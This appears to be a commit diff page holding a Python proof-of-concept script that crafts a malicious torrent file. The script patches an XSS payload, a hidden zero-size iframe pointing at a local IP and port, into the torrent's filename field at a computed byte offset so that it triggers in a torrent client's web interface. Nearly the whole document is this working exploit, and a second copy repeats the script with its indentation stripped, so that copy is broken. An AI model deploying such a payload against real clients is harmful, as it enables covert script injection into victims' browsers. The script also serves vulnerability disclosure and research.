cas-- · March 1, 2021 23:54
diff --git a/torrent_xss.py b/torrent_xss.py
 #!/usr/bin/env python3
 #
 # Copyright (c) 2021 Jasper Lievisse Adriaanse <[email protected]>
 #
 # Permission to use, copy, modify, and distribute this software for any
 # purpose with or without fee is hereby granted, provided that the above
 # copyright notice and this permission notice appear in all copies.
 #
 # THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
 # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
 # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
 # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
 # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
 # ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
 # OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
 #
 # PoC for creating torrent files which leverage XSS vulnerabilities in the
 # web interface of a torrent client.

 import math
 import os
 import shutil
 import sys

 from torf import Torrent

 def main():
 	payload = {
 		'xss': br'''movie.mp4<iframe src="http://192.168.178.171:8000" style="position: absolute;width:0;height:0;border:0;"></iframe>''',
 		'trackers': ['https://tracker1.example.org:1234/announce', 'https://tracker2.example.org:1234/announce'],
 		'comment': 'Lorum ipsum.',
 		'filename': 'xss_poc.torrent',
 	}

 	fake_path = 'A' * len(payload['xss'])
 	# Create the fake file to ensure the final torrent file has the placeholder string of the correct length.
 	try:
 		with open(fake_path, 'w') as fh:
 			fh.write(payload['comment'])
 			fh.close()
 	except Exception as e:
 		print(f'Failed to create fake file: {e}')
 		sys.exit(1)

 	t = Torrent(path=fake_path, trackers=payload['trackers'], comment=payload['comment'])
 	t.private = True
 	t.generate()

 	try:
 		if os.path.exists(payload['filename']):
 			os.remove(payload['filename'])

 		t.write(payload['filename'])

 		os.remove(fake_path)
 	except Exception as e:
 		print(f'Failed to remove {payload["filename"]}: {e}')
 		sys.exit(1)

 	# The offset is determined by the length of the number representing the length.
 	# I.e., if the length is '101' bytes we need to account for '3' bytes.
 	# Due to coercion we cannot use int(str(len(...))) because '101' will be
 	# interpreted as '101' again.
 	offset = 244 + int(math.log10(len(payload['xss']))+1)
 	# Re-open the torrent file and insert the XSS payload
 	try:
 		print(f'[+] Injecting XSS payload at offset {offset}')
 		with open(payload['filename'], 'rb+') as fh:
 			fh.seek(offset)
 			fh.write(bytearray(payload['xss']))
 	except Exception as e:
 		print(f'Failed to inject payload: {e}')
 		sys.exit(1)

 if __name__ == '__main__':
 	main()
	#!/usr/bin/env python3
	#
	# Copyright (c) 2021 Jasper Lievisse Adriaanse <[email protected]>
	#
	# Permission to use, copy, modify, and distribute this software for any
	# purpose with or without fee is hereby granted, provided that the above
	# copyright notice and this permission notice appear in all copies.
	#
	# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
	# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
	# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
	# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
	# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
	# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
	# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
	#
	# PoC for creating torrent files which leverage XSS vulnerabilities in the
	# web interface of a torrent client.

	import math
	import os
	import shutil
	import sys

	from torf import Torrent

	def main():
	payload = {
	'xss': br'''movie.mp4<iframe src="http://192.168.178.171:8000" style="position: absolute;width:0;height:0;border:0;"></iframe>''',
	'trackers': ['https://tracker1.example.org:1234/announce', 'https://tracker2.example.org:1234/announce'],
	'comment': 'Lorum ipsum.',
	'filename': 'xss_poc.torrent',
	}

	fake_path = 'A' * len(payload['xss'])
	# Create the fake file to ensure the final torrent file has the placeholder string of the correct length.
	try:
	with open(fake_path, 'w') as fh:
	fh.write(payload['comment'])
	fh.close()
	except Exception as e:
	print(f'Failed to create fake file: {e}')
	sys.exit(1)

	t = Torrent(path=fake_path, trackers=payload['trackers'], comment=payload['comment'])
	t.private = True
	t.generate()

	try:
	if os.path.exists(payload['filename']):
	os.remove(payload['filename'])

	t.write(payload['filename'])

	os.remove(fake_path)
	except Exception as e:
	print(f'Failed to remove {payload["filename"]}: {e}')
	sys.exit(1)

	# The offset is determined by the length of the number representing the length.
	# I.e., if the length is '101' bytes we need to account for '3' bytes.
	# Due to coercion we cannot use int(str(len(...))) because '101' will be
	# interpreted as '101' again.
	offset = 244 + int(math.log10(len(payload['xss']))+1)
	# Re-open the torrent file and insert the XSS payload
	try:
	print(f'[+] Injecting XSS payload at offset {offset}')
	with open(payload['filename'], 'rb+') as fh:
	fh.seek(offset)
	fh.write(bytearray(payload['xss']))
	except Exception as e:
	print(f'Failed to inject payload: {e}')
	sys.exit(1)

	if __name__ == '__main__':
	main()